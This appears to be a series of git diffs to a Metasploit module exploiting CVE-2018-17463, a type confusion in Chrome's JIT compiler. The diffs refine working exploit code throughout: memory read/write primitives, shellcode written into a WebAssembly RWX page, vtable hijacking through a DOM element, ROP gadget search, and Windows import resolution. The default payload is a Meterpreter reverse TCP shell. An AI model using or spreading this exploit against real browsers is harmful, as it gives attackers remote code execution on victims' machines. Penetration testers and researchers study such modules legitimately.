+        `);
+
+        let propertyValues = [];
+        propertyValues[p1] = {x1: 13.37, x2: 13.38};
+        propertyValues[p2] = {y1: obj};
+
+        let i = 0;
+        for (; i < MAX_ITERATIONS; i++) {
+            let res = vuln(make(propertyValues));
+            if (res !== 13.37)
+                return res.toBigInt()
+        }
+
+        fail("Addrof failed");
+    }
+
+    function corrupt_arraybuffer(victim, newValue) {
+        eval(`
+            function vuln(o) {
+                let a = o.inline;
+                this.Object.create(o);
+                let orig = o.p${p1}.x2;
+                o.p${p1}.x2 = ${newValue.toNumber()};
+                return orig;
+            }
+        `);
+
+        let propertyValues = [];
+        let o = {x1: 13.37, x2: 13.38};
+        propertyValues[p1] = o;
+        propertyValues[p2] = victim;
+
+        for (let i = 0; i < MAX_ITERATIONS; i++) {
+            o.x2 = 13.38;
+            let r = vuln(make(propertyValues));
+            if (r !== 13.38)
+                return r.toBigInt();
+        }
+
+        fail("Corrupt ArrayBuffer failed");
+    }
+
+    let [p1, p2] = find_overlapping_properties();
+    print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
+
+    let memview_buf = new ArrayBuffer(1024);
+    let driver_buf = new ArrayBuffer(1024);
+
+    gc();
+
+    let memview_buf_addr = addrof(memview_buf);
+    memview_buf_addr--;
+    print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
+
+    let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
+
+    let driver = new BigUint64Array(driver_buf);
+    let original_memview_buf_ptr = driver[4];
+
+    let memory = {
+        write(addr, bytes) {
+            driver[4] = addr;
+            let memview = new Uint8Array(memview_buf);
+            memview.set(bytes);
+        },
+        read(addr, len) {
+            driver[4] = addr;
+            let memview = new Uint8Array(memview_buf);
+            return memview.subarray(0, len);
+        },
+        readPtr(addr) {
+            driver[4] = addr;
+            let memview = new BigUint64Array(memview_buf);
+            return memview[0];
+        },
+        writePtr(addr, ptr) {
+            driver[4] = addr;
+            let memview = new BigUint64Array(memview_buf);
+            memview[0] = ptr;
+        },
+        addrof(obj) {
+            memview_buf.leakMe = obj;
+            let props = this.readPtr(memview_buf_addr + 8n);
+            return this.readPtr(props + 15n) - 1n;
+        },
+    };
+
+    // Generate a RWX region for the payload
+    function get_wasm_instance() {
+      var buffer = new Uint8Array([
+        0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,
+        1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,
+        128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,
+        101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11
+      ]);
+      return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
+    }
+
+    let wasm_instance = get_wasm_instance();
+    let wasm_addr = memory.addrof(wasm_instance);
+    print("wasm_addr @ " + hex(wasm_addr));
+    let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);
+    print("wasm_rwx @ " + hex(wasm_rwx_addr));
+
+    memory.write(wasm_rwx_addr, shellcode);
+
+    let fake_vtab = new ArrayBuffer(0x80);
+    let fake_vtab_u64 = new BigUint64Array(fake_vtab);
+    let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);
+
+    let div = document.createElement('div');
+    let div_addr = memory.addrof(div);
+    print('div_addr @ ' + hex(div_addr));
+    let el_addr = memory.readPtr(div_addr + 0x20n);
+    print('el_addr @ ' + hex(div_addr));
+
+    fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);
+    memory.writePtr(el_addr, fake_vtab_addr);
+
+    print('Triggering...');
+
+    // Trigger virtual call
+    div.dispatchEvent(new Event('click'));
+
+    // We are done here, repair the corrupted array buffers
+    let addr = memory.addrof(driver_buf);
+    memory.writePtr(addr + 32n, original_driver_buf_ptr);
+    memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);
+}
+
+pwn();
+^
+
+    if datastore['DEBUG_EXPLOIT']
+      debugjs = %Q^
+print = function(arg) {
+  var request = new XMLHttpRequest();
+  request.open("POST", "/print", false);
+  request.send("" + arg);
+};
+^
+      jscript = "#{debugjs}#{jscript}"
+    else
+      jscript.gsub!(/\/\/.*$/, '') # strip comments
+      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
+    end
+
     html = %Q^
 <html>
-    <head>
-        <script>
-
-        #{ datastore['DEBUG_EXPLOIT'] ? 'print = function(arg) {
-          var request = new XMLHttpRequest();
-          request.open("POST", "/print", false);
-          request.send("" + arg);
-        };
-        ' : '' }
-
-        let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
-
-        let ab = new ArrayBuffer(8);
-        let floatView = new Float64Array(ab);
-        let uint64View = new BigUint64Array(ab);
-        let uint8View = new Uint8Array(ab);
-
-        Number.prototype.toBigInt = function toBigInt() {
-            floatView[0] = this;
-            return uint64View[0];
-        };
-
-        BigInt.prototype.toNumber = function toNumber() {
-            uint64View[0] = this;
-            return floatView[0];
-        };
-
-        function hex(n) {
-            return '0x' + n.toString(16);
-        };
-
-        function fail(s) {
-            print('FAIL ' + s);
-            throw null;
-        }
-
-        const NUM_PROPERTIES = 32;
-        const MAX_ITERATIONS = 100000;
-
-        function gc() {
-            for (let i = 0; i < 200; i++) {
-                new ArrayBuffer(0x100000);
-            }
-        }
-
-        function make(properties) {
-            let o = {inline: 42}      // TODO
-            for (let i = 0; i < NUM_PROPERTIES; i++) {
-                eval(`o.p${i} = properties[${i}];`);
-            }
-            return o;
-        }
-
-        function pwn() {
-            function find_overlapping_properties() {
-                let propertyNames = [];
-                for (let i = 0; i < NUM_PROPERTIES; i++) {
-                    propertyNames[i] = `p${i}`;
-                }
-                eval(`
-                    function vuln(o) {
-                        let a = o.inline;
-                        this.Object.create(o);
-                        ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\n')}
-                        return [${propertyNames.join(', ')}];
-                    }
-                `);
-
-                let propertyValues = [];
-                for (let i = 1; i < NUM_PROPERTIES; i++) {
-                    propertyValues[i] = -i;
-                }
-
-                for (let i = 0; i < MAX_ITERATIONS; i++) {
-                    let r = vuln(make(propertyValues));
-                    if (r[1] !== -1) {
-                        for (let i = 1; i < r.length; i++) {
-                            if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
-                                return [i, -r[i]];
-                            }
-                        }
-                    }
-                }
-
-                fail("Failed to find overlapping properties");
-            }
-
-            function addrof(obj) {
-                eval(`
-                    function vuln(o) {
-                        let a = o.inline;
-                        this.Object.create(o);
-                        return o.p${p1}.x1;
-                    }
-                `);
-
-                let propertyValues = [];
-                propertyValues[p1] = {x1: 13.37, x2: 13.38};
-                propertyValues[p2] = {y1: obj};
-
-                let i = 0;
-                for (; i < MAX_ITERATIONS; i++) {
-                    let res = vuln(make(propertyValues));
-                    if (res !== 13.37)
-                        return res.toBigInt()
-                }
-
-                fail("Addrof failed");
-            }
-
-            function corrupt_arraybuffer(victim, newValue) {
-                eval(`
-                    function vuln(o) {
-                        let a = o.inline;
-                        this.Object.create(o);
-                        let orig = o.p${p1}.x2;
-                        o.p${p1}.x2 = ${newValue.toNumber()};
-                        return orig;
-                    }
-                `);
-
-                let propertyValues = [];
-                let o = {x1: 13.37, x2: 13.38};
-                propertyValues[p1] = o;
-                propertyValues[p2] = victim;
-
-                for (let i = 0; i < MAX_ITERATIONS; i++) {
-                    o.x2 = 13.38;
-                    let r = vuln(make(propertyValues));
-                    if (r !== 13.38)
-                        return r.toBigInt();
-                }
-
-                fail("Corrupt ArrayBuffer failed");
-            }
-
-            let [p1, p2] = find_overlapping_properties();
-            print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
-
-            let memview_buf = new ArrayBuffer(1024);
-            let driver_buf = new ArrayBuffer(1024);
-
-            gc();
-
-            let memview_buf_addr = addrof(memview_buf);
-            memview_buf_addr--;
-            print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
-
-            let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
-
-            let driver = new BigUint64Array(driver_buf);
-            let original_memview_buf_ptr = driver[4];
-
-            let memory = {
-                write(addr, bytes) {
-                    driver[4] = addr;
-                    let memview = new Uint8Array(memview_buf);
-                    memview.set(bytes);
-                },
-                read(addr, len) {
-                    driver[4] = addr;
-                    let memview = new Uint8Array(memview_buf);
-                    return memview.subarray(0, len);
-                },
-                readPtr(addr) {
-                    driver[4] = addr;
-                    let memview = new BigUint64Array(memview_buf);
-                    return memview[0];
-                },
-                writePtr(addr, ptr) {
-                    driver[4] = addr;
-                    let memview = new BigUint64Array(memview_buf);
-                    memview[0] = ptr;
-                },
-                addrof(obj) {
-                    memview_buf.leakMe = obj;
-                    let props = this.readPtr(memview_buf_addr + 8n);
-                    return this.readPtr(props + 15n) - 1n;
-                },
-            };
-
-            function get_wasm_instance() {
-              var buffer = new Uint8Array([
-                0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,
-                1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,
-                128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,
-                101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11
-              ]);
-              return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
-            }
-
-            let wasm_instance = get_wasm_instance();
-            let wasm_addr = memory.addrof(wasm_instance);
-            print("wasm_addr @ " + hex(wasm_addr));
-            let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);
-            print("wasm_rwx @ " + hex(wasm_rwx_addr));
-
-            memory.write(wasm_rwx_addr, shellcode);
-
-            let fake_vtab = new ArrayBuffer(0x80);
-            let fake_vtab_u64 = new BigUint64Array(fake_vtab);
-            let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);
-
-            let div = document.createElement('div');
-            let div_addr = memory.addrof(div);
-            print('div_addr @ ' + hex(div_addr));
-            let el_addr = memory.readPtr(div_addr + 0x20n);
-            print('el_addr @ ' + hex(div_addr));
-
-            fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);
-            memory.writePtr(el_addr, fake_vtab_addr);
-
-            print('Triggering...');
-
-            // Trigger virtual call
-            div.dispatchEvent(new Event('click'));
-
-            // We are done here, repair the corrupted array buffers
-            let addr = memory.addrof(driver_buf);
-            memory.writePtr(addr + 32n, original_driver_buf_ptr);
-            memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);
-        }
-
-        pwn();
-        </script>
-    </head>
-    <body>
-    </body>
+<head>
+<script>
+#{jscript}
+</script>
+</head>
+<body>
+</body>
 </html>
-    ^
-    unless datastore['DEBUG_EXPLOIT']
-      html.gsub!(/\/\/.*$/, '') # strip comments
-      html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
-    end
+^
+
     send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
   end
 

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -12,6 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Google Chrome 67, 68 and 69 Object.create exploit',
       'Description'    => %q{
+        This modules exploits a type confusion in Google Chromes JIT compiler.
+      The Object.create operation can be used to cause a type confusion between a
+      PropertyArray and a NameDictionary.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [
@@ -237,17 +240,93 @@ class MetasploitModule < Msf::Exploit::Remote
 
             let div = document.createElement('div');
             let div_addr = memory.addrof(div);
-            print('div_addr = ' + hex(div_addr));
+            print('div_addr @ ' + hex(div_addr));
             let el_addr = memory.readPtr(div_addr + 0x20n);
             let leak = memory.readPtr(el_addr);
 
             print('leak @ ' + hex(leak));
-            //let chrome_child = (leak - 0x40b4500n) & 0x7ffffff0000n;
-            let chrome_child = leak - 0x40b5f20n;
+            function find_pe(address) {
+                let search_pe = address & 0x7fffffff0000n;
+                while (1) {
+                    let read_val = memory.read(search_pe, 2);
+                    if (read_val[0] == 77
+                        && read_val[1] == 90) { //MZ
+                        return search_pe;
+                    }
+                    search_pe -= 0x10000n;
+                }
+            }
 
+            //let chrome_child = (leak - 0x40b4500n) & 0x7ffffff0000n;
+            let chrome_child = find_pe(leak);
             print('chrome_child @ ' + hex(chrome_child));
+
+            function strcmp(input_string, str_address) {
+                for (var str_index=0;;str_index++) {
+                    let string_data = memory.read(str_address + str_index.toBigInt(), 1);
+                    if (input_string.length == str_index) {
+                        if (string_data[0] == 0) {
+                            return 0;
+                        }
+                        return -1;
+                    }
+                    if (string_data[0] != input_string.charCodeAt(str_index)) {
+                        return -1;
+                    }
+                }
+            }
+
+            function get_proc_address(base_pe, module, procname) {
+                let base_pe_hdr = base_pe + (memory.readPtr(base_pe + 0x3cn) & 0xffffn);
+                print('base_pe_hdr @ ' + hex(base_pe_hdr));
+                let base_pe_optional_header = base_pe_hdr + 0x18n;
+                print('base_pe_optional_header @ ' + hex(base_pe_optional_header));
+                let export_table = memory.readPtr(base_pe_optional_header + 0x70n) & 0xffffffffn;
+                print('exports @ ' + hex(export_table));
+                print('exports @ ' + hex(base_pe + export_table));
+                let import_table = memory.readPtr(base_pe_optional_header + 0x78n) & 0xffffffffn;
+                let import_size = memory.readPtr(base_pe_optional_header + 0x80n) & 0xffffffffn;
+                print('imports @ ' + hex(import_table));
+                print('imports @ ' + hex(base_pe + import_table));
+                print('import count @ ' + hex(import_size));
+                let iat = memory.readPtr(base_pe_optional_header + 0xd0n) & 0xffffffffn;
+                print('iat @ ' + hex(iat));
+                print('iat @ ' + hex(base_pe + iat));
+                let iat_thunk = memory.readPtr(base_pe + iat);
+                print('iat thunk @ ' + hex(iat_thunk));
+
+                alert('go');
+                for (var i=0n;i<import_size;i++) {
+                    let import_name = memory.readPtr(base_pe + import_table + 0xcn + (i * 0x14n)) & 0xffffffffn;
+                    if (import_name == 0) break;
+                    alert('strcmp');
+                    if (strcmp(module, base_pe + import_name) == 0) {
+                        alert('found');
+                        let import_org_thunk = memory.readPtr(base_pe + import_table + (i * 0x14n)) & 0xffffffffn;
+                        let import_thunk = memory.readPtr(base_pe + import_table + 0x10n + (i * 0x14n)) & 0xffffffffn;
+                        print("import org thunk " + hex(import_org_thunk));
+                        print("import thunk " + hex(import_thunk));
+                        for (var j=0n;;j++) {
+                            let thunk = memory.readPtr(base_pe + import_org_thunk + 0x8n * j);
+                            if (thunk == 0) break;
+                            //print("func hex = " + hex(thunk));
+                            //print("import cruft = " + hex(memory.readPtr(base_pe + thunk + 0x2n)));
+                            if (strcmp(procname, base_pe + thunk + 0x2n) == 0) {
+                                print("func addr " + hex(thunk_addr));
+                                return memory.readPtr(base_pe + import_thunk + 0x8n * j);
+                            }
+                        }
+                        break;
+                    }
+                }
+                fail('get_proc_address could not find ' + module + ':' + procname + ' in ' + hex(base_pe));
+            }
+            print("CreateEventW = " + hex(get_proc_address(chrome_child, "KERNEL32.DLL", "CreateEventW")));
+
+            //alert(hex(chrome_child + iat));
+
             //print('createeventw @ ' + hex(chrome_child + 0x4770260n));
-            //print('createeventw = ' + hex(memory.readPtr(chrome_child + 0x4770260n)));
+            //print('createeventw @ ' + hex(memory.readPtr(chrome_child + 0x4770260n)));
 
             // CreateEventW
             //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20750n;

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -265,33 +265,47 @@ class MetasploitModule < Msf::Exploit::Remote
                 for (var str_index=0;;str_index += 1) {
                     let string_data = memory.read(str_address + BigInt(str_index), 8);
                     if (input_string.length == str_index) {
-                        if (string_data[0] == 0) {
-                            return 0;
-                        }
+                        if (string_data[0] == 0) return 0;
                         return -1;
                     }
-                    if (string_data[0] != input_string.charCodeAt(str_index)) {
-                        return -1;
+                    if (string_data[0] != input_string.charCodeAt(str_index)) return -1;
+                }
+            }
+
+            function find_gadget(base_pe, gadget) {
+                for (var i=0n;i<0x1000n;i++) {
+                    let text_section = memory.readPtr(base_pe + i * 0x8n);
+                    if (text_section != 0x747865742e && text_section != 0x5452) continue; // .text or RZ
+                    let text_size = (memory.readPtr(base_pe + i * 0x8n + 0x8n) & 0xffffffffn);
+                    let text_address = (memory.readPtr(base_pe + i * 0x8n + 0xcn) & 0xffffffffn);
+                    let text_start = base_pe + text_address;
+                    let text_end = text_start + text_size;
+                    for (let search = text_start;search<text_end;search+=1n) {
+                        for (var j=0;j<gadget.length;j++) {
+                            let data = memory.read(search + BigInt(j), 1);
+                            if (data[0] != gadget[j]) break;
+                            if (j == gadget.length - 1) {
+                                return search;
+                            }
+                        }
                     }
                 }
             }
 
             function get_proc_address(base_pe, dllname, procname) {
-                let base_pe_hdr = base_pe + (memory.readPtr(base_pe + 0x3cn) & 0xffffn);
-                let base_pe_optional_header = base_pe_hdr + 0x18n;
+                let base_pe_optional_header = base_pe + (memory.readPtr(base_pe + 0x3cn) & 0xffffn) + 0x18n;
                 let import_table = memory.readPtr(base_pe_optional_header + 0x78n) & 0xffffffffn;
                 let import_size = memory.readPtr(base_pe_optional_header + 0x80n) & 0xffffffffn;
-
                 for (var i=0n;i<import_size;i++) {
                     let import_name = memory.readPtr(base_pe + import_table + 0xcn + (i * 0x14n)) & 0xffffffffn;
                     if (import_name == 0) break;
                     if (strcmp(dllname, base_pe + import_name) == 0) {
                         let import_org_thunk = memory.readPtr(base_pe + import_table + (i * 0x14n)) & 0xffffffffn;
-                        let import_thunk = memory.readPtr(base_pe + import_table + 0x10n + (i * 0x14n)) & 0xffffffffn;
                         for (var j=0n;;j++) {
                             let thunk = memory.readPtr(base_pe + import_org_thunk + 0x8n * j);
                             if (thunk == 0) break;
                             if (strcmp(procname, base_pe + thunk + 0x2n) == 0) {
+                                let import_thunk = memory.readPtr(base_pe + import_table + 0x10n + (i * 0x14n)) & 0xffffffffn;
                                 let thunk_addr = memory.readPtr(base_pe + import_thunk + 0x8n * j);
                                 return thunk_addr;
                             }
@@ -308,43 +322,32 @@ class MetasploitModule < Msf::Exploit::Remote
             let kernel32 = find_pe(virtualprotect);
             print('kernel32 @ ' + hex(kernel32));
 
-            //log('ntqueryevent import @ ' + hex(kernel32 + 0x78208n));
-            //log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x78208n)));
-            // kernel32 00007FFF5D9A0000 NtQueryEvent import 00007FFF5DA18208
-            // ntdll    00007FFF5FE40000 NtQueryEvent export 00007FFF5FEDB450
+            let ntqueryevent = get_proc_address(kernel32, "ntdll.dll", "NtQueryEvent");
+            print("ntqueryevent = " + hex(ntqueryevent));
 
-            //log('ntqueryevent import @ ' + hex(kernel32 + 0x9c478n));
-            //log('ntqueryevent export @ ' + hex(memory.readPtr(kernel32 + 0x9c478n)));
-            // kernel32 0000000076E10000 0000000076EAC478
-            // ntdll 0x76F30000 0x76f81870
-
-            //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9a9a0n;
-            let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9b450n;
-            //let ntdll = memory.readPtr(kernel32 + 0x9c478n) - 0x51870n;
-
+            let ntdll = find_pe(ntqueryevent);
             print('ntdll @ ' + hex(ntdll));
 
-            /*
-            00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]
-            00007ff9`296f0709 488b6918        mov     rbp,qword ptr [rcx+18h]
-            00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]
-            00007ff9`296f0711 ffe2            jmp     rdx
+            //00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]
+            //00007ff9`296f0709 488b6918        mov     rbp,qword ptr [rcx+18h]
+            //00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]
+            //00007ff9`296f0711 ffe2            jmp     rdx
 
-            0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
-            00007FFF5FEE11B5 488B5150
+            let gadget = find_gadget(ntdll, [0x48, 0x8b, 0x51, 0x50, 0x48, 0x8b, 0x69, 0x18]);
 
-            0x78ea1045      488b5150       mov rdx, qword [rcx + 0x50]
-            */
+            //0x1800a11b5      488b5150       mov rdx, qword [rcx + 0x50]
+            //00007FFF5FEE11B5 488B5150
+            //0x78ea1045      488b5150       mov rdx, qword [rcx + 0x50]
 
             //let gadget = 0x41414141n;
             //let gadget = ntdll + 0xA0705n;
-            let gadget = ntdll + 0xa11b5n;
+            //let gadget = ntdll + 0xa11b5n;
             //let gadget = ntdll + 0x51045n;
 
 //    chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
 //0x000000018007522f: pop rcx; ret;
 
-            let pop_gadgets = [
+            let pop_gadgets_old = [
 //                chrome_child + 0x7522fn,   // pop rcx ; ret     59 c3
                 chrome_child + 0x36a657n,  // pop rcx ; ret     59 c3
                 chrome_child + 0x9962n,    // pop rdx ; ret     5a c3
@@ -352,7 +355,14 @@ class MetasploitModule < Msf::Exploit::Remote
                 chrome_child + 0xc51425n,  // pop r9 ; ret      41 59 c3
             ];
 
-            //print('gadget @ ' + hex(gadget));
+            let pop_gadgets = [
+                find_gadget(chrome_child, [0x59, 0xc3]),
+                find_gadget(chrome_child, [0x5a, 0xc3]),
+                find_gadget(chrome_child, [0x41, 0x58, 0xc3]),
+                find_gadget(chrome_child, [0x41, 0x59, 0xc3]),
+            ];
+
+            print('gadget @ ' + hex(gadget));
             //print('gadget = ' + hex(memory.readPtr(gadget) & 0xffffffffn));
             //print('pop_gadget @ ' + hex(pop_gadgets[0]));
             //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[0]) & 0xffffn));

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -266,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
             let el_addr = memory.readPtr(div_addr + 0x20n);
             print('el_addr @ ' + hex(div_addr));
 
-            fake_vtab_u64[8] = wasm_rwx_addr;
+            fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);
             memory.writePtr(el_addr, fake_vtab_addr);
 
             print('Triggering...');

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -20,6 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     => [
           ['CVE', '2018-17463'],
+          ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],
+          ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],
+          ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],
         ],
       'Arch'           => [ ARCH_X64 ],
       'Platform'       => 'windows',
@@ -27,16 +31,31 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' },
       'Targets'        => [ [ 'Automatic', { } ] ],
       'DisclosureDate' => 'Sep 25 2018'))
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
+    ])
   end
 
   def on_request_uri(cli, request)
+
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] " + request.body)
+      send_response(cli, '')
+      return
+    end
+
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
     html = %Q^
 <html>
     <head>
         <script>
-        log = alert;
-        print = alert;
+
+        #{ datastore['DEBUG_EXPLOIT'] ? 'print = function(arg) {
+          var request = new XMLHttpRequest();
+          request.open("POST", "/print", false);
+          request.send("" + arg);
+        };
+        ' : '' }
 
         // We need some space later
         let scratch = new ArrayBuffer(0x100000);
@@ -171,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
 
             let [p1, p2] = find_overlapping_properties();
-            log(`[+] Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
+            print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
 
             let memview_buf = new ArrayBuffer(1024);
             let driver_buf = new ArrayBuffer(1024);
@@ -181,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
             let memview_buf_addr = addrof(memview_buf);
             memview_buf_addr--;
-            log(`[+] ArrayBuffer @ ${hex(memview_buf_addr)}`);
+            print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
 
             let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
 
@@ -218,21 +237,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
             let div = document.createElement('div');
             let div_addr = memory.addrof(div);
-            alert('div_addr = ' + hex(div_addr));
+            print('div_addr = ' + hex(div_addr));
             let el_addr = memory.readPtr(div_addr + 0x20n);
             let leak = memory.readPtr(el_addr);
 
             print('leak @ ' + hex(leak));
-            let chrome_child = (leak - 0x40b4500n) & 0x7ffffff0000n;
+            //let chrome_child = (leak - 0x40b4500n) & 0x7ffffff0000n;
+            let chrome_child = leak - 0x40b5f20n;
 
             print('chrome_child @ ' + hex(chrome_child));
-            log('createeventw @ ' + hex(chrome_child + 0x4770260n));
-            log('createeventw = ' + hex(memory.readPtr(chrome_child + 0x4770260n)));
+            //print('createeventw @ ' + hex(chrome_child + 0x4770260n));
+            //print('createeventw = ' + hex(memory.readPtr(chrome_child + 0x4770260n)));
 
             // CreateEventW
             //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20750n;
-            //let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20d10n;
-            let kernel32 = memory.readPtr(chrome_child + 0x4770260n) - 0x15290n;
+            let kernel32 = memory.readPtr(chrome_child + 0x4771260n) - 0x20d10n;
+            //let kernel32 = memory.readPtr(chrome_child + 0x4770260n) - 0x15290n;
 
             print('kernel32 @ ' + hex(kernel32));
             //log('ntqueryevent import @ ' + hex(kernel32 + 0x78208n));
@@ -246,14 +266,14 @@ class MetasploitModule < Msf::Exploit::Remote
             // ntdll 0x76F30000 0x76f81870
 
             //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9a9a0n;
-            //let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9b450n;
-            let ntdll = memory.readPtr(kernel32 + 0x9c478n) - 0x51870n;
+            let ntdll = memory.readPtr(kernel32 + 0x78208n) - 0x9b450n;
+            //let ntdll = memory.readPtr(kernel32 + 0x9c478n) - 0x51870n;
 
             print('ntdll @ ' + hex(ntdll));
 
             //kernel32 + 0x193d0n, // VirtualProtect
-            //let virtualprotect = kernel32 + 0x1ACB0n;
-            let virtualprotect = kernel32 + 0x2ef0n;
+            let virtualprotect = kernel32 + 0x1ACB0n;
+            //let virtualprotect = kernel32 + 0x2ef0n;
             print('virtualprotect @ ' + hex(virtualprotect));
 
             /*
@@ -270,31 +290,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
             //let gadget = 0x41414141n;
             //let gadget = ntdll + 0xA0705n;
-            //let gadget = ntdll + 0xa11b5n;
-            let gadget = ntdll + 0x51045n;
+            let gadget = ntdll + 0xa11b5n;
+            //let gadget = ntdll + 0x51045n;
 
 //    chrome_child + 0x36a657n, // pop rcx ; ret     59 c3
 //0x000000018007522f: pop rcx; ret;
 
             let pop_gadgets = [
-                chrome_child + 0x7522fn,   // pop rcx ; ret     59 c3
+//                chrome_child + 0x7522fn,   // pop rcx ; ret     59 c3
+                chrome_child + 0x36a657n,  // pop rcx ; ret     59 c3
                 chrome_child + 0x9962n,    // pop rdx ; ret     5a c3
                 chrome_child + 0xc72852n,  // pop r8 ; ret      41 58 c3
                 chrome_child + 0xc51425n,  // pop r9 ; ret      41 59 c3
             ];
 
-            /*
-            log('gadget @ ' + hex(gadget));
-            log('gadget = ' + hex(memory.readPtr(gadget) & 0xffffffffn));
-            log('pop_gadget @ ' + hex(pop_gadgets[0]));
-            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[0]) & 0xffffn));
-            log('pop_gadget @ ' + hex(pop_gadgets[1]));
-            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[1]) & 0xffffn));
-            log('pop_gadget @ ' + hex(pop_gadgets[2]));
-            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[2]) & 0xffffffn));
-            log('pop_gadget @ ' + hex(pop_gadgets[3]));
-            log('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[3]) & 0xffffffn));
-            */
+            //print('gadget @ ' + hex(gadget));
+            //print('gadget = ' + hex(memory.readPtr(gadget) & 0xffffffffn));
+            //print('pop_gadget @ ' + hex(pop_gadgets[0]));
+            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[0]) & 0xffffn));
+            //print('pop_gadget @ ' + hex(pop_gadgets[1]));
+            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[1]) & 0xffffn));
+            //print('pop_gadget @ ' + hex(pop_gadgets[2]));
+            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[2]) & 0xffffffn));
+            //print('pop_gadget @ ' + hex(pop_gadgets[3]));
+            //print('pop_gadget = ' + hex(memory.readPtr(pop_gadgets[3]) & 0xffffffn));
 
             let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);
 
@@ -341,7 +360,6 @@ class MetasploitModule < Msf::Exploit::Remote
             memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);
         }
 
-        alert("Press OK to pwn");
         pwn();
         </script>
     </head>
@@ -349,6 +367,10 @@ class MetasploitModule < Msf::Exploit::Remote
     </body>
